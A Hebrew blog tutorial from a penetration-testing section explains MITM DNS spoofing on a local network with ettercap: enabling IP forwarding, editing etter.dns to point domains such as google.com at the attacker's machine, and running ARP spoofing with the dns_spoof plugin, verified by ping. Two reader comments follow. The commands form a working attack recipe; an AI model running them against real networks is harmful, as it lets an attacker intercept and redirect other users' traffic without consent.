Home אבטחת מידעPenetration Testing - Offense MITM DNS Spoofing התחזות לשרת DNS

MITM DNS Spoofing התחזות לשרת DNS

by Tal Ben Shushan 23/10/2014 2 comments
MITM DNS Spoofing התחזות לשרת DNS
נהנתם מהמאמר ? שתפו אותו!

MITM DNS Spoofing התחזות לשרת DNS

הסבר מלא מהו MITM תוכלו למצוא פה

נתחיל בכך שנגדיר את המחשב שלנו כמעביר IPV4

נפתח את ה Terminal ונרשום

echo 1 > /proc/sys/net/ipv4/ip_forward

DNS Spoofing

DNS Spoofing

כעת נרשום locate etetercap.dns

DNS Spoofing

DNS Spoofing

נרשום

nano /etc/ettercap/ettercap/etter.dns

DNS Spoofing

DNS Spoofing

נוסיף את השורה שבה נכניס את הכתובת של המחשב שלנו (עליו יישב האתר המדומה) ואת הכתובת שאם המשתמש יקיש הוא יגיע לIP שנרשום

DNS Spoofing

DNS Spoofing

כעת נפעיל את ה ARP Spoofing

פתחו Terminal חדש והקישו

ettercap -T -q -M arp:remote -P dns_spoof //

DNS Spoofing

DNS Spoofing

ובסיום כל הכתובות שהכנסתם יוגדרו

ניתן לראות שמעכשיו google.com הוא לא הכתובת המקורית ועכשיו היא 192.168.1.106

DNS Spoofing

DNS Spoofing

ובשביל לאמת זאת נכנס לאחד המחשבים ברשת ונעשה פינג לכתובת google.com

כל הזכויות שמורות לטל בן שושן – Shushan.co.il

לאחר הפינג ניתן לאמת שב DNS Spoofing עובד!

DNS Spoofing

DNS Spoofing

מאמרים קשורים

2 comments

Tal Ben Shushan 20/12/2016 - 10:29

כן

Reply
Shlomi R 12/01/2017 - 23:57

אני נהנה כל פעם מחדש לקרוא את הפוסטים שלך. תודה רבה איש יקר!!

Reply

Leave a Comment